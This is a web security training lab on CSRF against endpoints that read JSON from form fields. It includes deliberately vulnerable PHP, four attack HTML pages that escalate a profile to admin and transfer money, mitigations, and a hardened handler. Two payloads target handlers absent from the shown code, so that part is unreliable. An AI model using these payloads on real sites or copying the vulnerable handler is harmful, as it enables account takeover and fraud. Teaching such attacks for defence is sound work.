Lab 4: CSRF with JSON Payloads

CSRF attacks using JSON payloads

Difficulty: High

Lab Overview

This lab demonstrates CSRF vulnerabilities in endpoints that accept JSON payloads. Many modern web applications accept JSON data; in this lab the JSON is carried as a string inside an ordinary form field (json_data, json_profile), so a cross-site HTML form can submit it with the victim's session cookie and no custom Content-Type or CORS preflight is needed, and the endpoint decodes and acts on it without any CSRF validation.

Objective: Use JSON payloads to perform CSRF attacks and bypass traditional form-based protections.

Vulnerable Code
<?php
session_start();

// Lab state: the victim's profile lives in the session. The defaults below are
// taken from the lab UI (assumed initialization; the lab's own bootstrap is not shown).
$user_profile = $_SESSION['user_profile'] ?? [
    'username' => 'victim_user',
    'email'    => 'victim@example.com',
    'role'     => 'user',
    'balance'  => 1000.00
];

// Vulnerable: No CSRF protection on JSON API
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['json_api'])) {
    // The JSON arrives as a plain form field, so any HTML form can submit it
    $json_data = $_POST['json_data'] ?? '';
    $decoded_data = json_decode($json_data, true);

    // Process JSON data without CSRF validation
    $_SESSION['api_data'][] = [
        'data' => $decoded_data,
        'timestamp' => date('Y-m-d H:i:s')
    ];
}

// Vulnerable: Profile update via JSON
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['json_profile_update'])) {
    $json_profile = $_POST['json_profile'] ?? '';
    $decoded_profile = json_decode($json_profile, true);

    // Update profile without CSRF validation: attacker-supplied keys (e.g. role) overwrite the stored profile
    $_SESSION['user_profile'] = array_merge($user_profile, $decoded_profile);
}
Current Profile (initial lab state)
  • Username: victim_user
  • Email: victim@example.com
  • Role: user
  • Balance: $1,000.00

Vulnerability Details
  • Type: CSRF with JSON Payloads
  • Severity: High
  • Method: POST
  • Issue: No CSRF protection on JSON API endpoints
JSON CSRF Attack Examples
  • json_csrf.html - Basic JSON CSRF attack
  • json_profile_csrf.html - Profile update via JSON
  • json_transfer_csrf.html - Money transfer via JSON
JSON CSRF Attack Payloads

Create these malicious HTML files to test JSON CSRF attacks:

1. Basic JSON CSRF (json_csrf.html):
<html>
<body>
<h1>API Integration Test</h1>
<form action="http://localhost/test/csrf/4.php" method="POST">
  <input type="hidden" name="json_api" value="1">
  <input type="hidden" name="json_data" value='{"action": "hack", "data": "malicious"}'>
  <input type="submit" value="Test API">
</form>
</body>
</html>
2. Profile Update JSON CSRF (json_profile_csrf.html):
<html>
<body>
<h1>Profile sync required!</h1>
<form action="http://localhost/test/csrf/4.php" method="POST">
  <input type="hidden" name="json_profile_update" value="1">
  <input type="hidden" name="json_profile" value='{"username": "hacked_user", "email": "hacker@evil.com", "role": "admin"}'>
  <input type="submit" value="Sync Profile">
</form>
</body>
</html>
3. Money Transfer JSON CSRF (json_transfer_csrf.html):
<html>
<body>
<h1>Payment processing update!</h1>
<form action="http://localhost/test/csrf/4.php" method="POST">
  <input type="hidden" name="json_transfer" value="1">
  <input type="hidden" name="json_transfer" value='{"amount": 500, "recipient": "attacker@evil.com"}'>
  <input type="submit" value="Process Payment">
</form>
</body>
</html>
4. Advanced JSON CSRF with JavaScript:
<html>
<body>
<h1>Advanced JSON CSRF Attack</h1>
<script>
// Create JSON payload
var jsonPayload = {
  "action": "admin_action",
  "data": {
    "command": "promote_user",
    "target": "attacker"
  }
};

// Send JSON request
fetch('http://localhost/test/csrf/4.php', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: 'json_admin=1&json_admin=' + encodeURIComponent(JSON.stringify(jsonPayload))
});
</script>
</body>
</html>
Real-World Attack Scenarios
Mitigation Strategies
  • Implement CSRF tokens for all JSON API endpoints
  • Validate Content-Type: accept JSON only from a genuine application/json request body, never from a form field, since an HTML form cannot send that type and a cross-origin fetch() with it triggers a CORS preflight
  • Implement request origin validation and CORS policies
  • Set the SameSite attribute (Lax or Strict) on the session cookie so it is not attached to cross-site POSTs
  • Implement proper API authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual JSON request patterns and anomalies
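The following is an added example, not the lab's own code: a hardened replacement for the json_api handler that applies the first four mitigations above. It assumes the legitimate client sends the JSON as the request body with Content-Type: application/json and repeats the session token in an X-CSRF-Token header (hypothetical header name); the allowed origin is a constructed value.

```php
<?php
// Added hardened handler (not the lab's code). Assumes: JSON in the request
// body with Content-Type: application/json, and the session token echoed in
// an X-CSRF-Token header (hypothetical header name chosen for this example).
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true, 'secure' => true]);
session_start();
// One random token per session; the page template embeds it for the real client.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

function reject(int $status, string $reason): void {
    http_response_code($status);
    header('Content-Type: application/json');
    echo json_encode(['error' => $reason]);
    exit;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // 1. Require a real JSON body. An HTML form cannot send this Content-Type,
    //    and a cross-origin fetch() with it triggers a CORS preflight.
    $ctype = $_SERVER['CONTENT_TYPE'] ?? '';
    if (stripos($ctype, 'application/json') !== 0) {
        reject(415, 'application/json body required');
    }
    // 2. Browsers attach Origin to cross-site POSTs; allow only our own site.
    $allowedOrigins = ['https://app.example.test'];   // constructed value
    if (!in_array($_SERVER['HTTP_ORIGIN'] ?? '', $allowedOrigins, true)) {
        reject(403, 'origin not allowed');
    }
    // 3. Session-bound token, compared in constant time.
    $sent = $_SERVER['HTTP_X_CSRF_TOKEN'] ?? '';
    if (!hash_equals($_SESSION['csrf_token'], $sent)) {
        reject(403, 'missing or invalid CSRF token');
    }
    // 4. Strict decoding: malformed JSON or a non-object is rejected instead of
    //    being stored as null/empty like the vulnerable json_decode() call.
    try {
        $decoded = json_decode(file_get_contents('php://input'), true, 32, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        reject(400, 'malformed JSON');
    }
    if (!is_array($decoded)) {
        reject(400, 'JSON object expected');
    }
    $_SESSION['api_data'][] = ['data' => $decoded, 'timestamp' => date('Y-m-d H:i:s')];
    header('Content-Type: application/json');
    echo json_encode(['ok' => true]);
}
```

With these checks in place, each of the four payload files above fails at step 1 (wrong Content-Type) before any data is decoded, and a forged request that somehow passes that still needs a matching Origin and the per-session token.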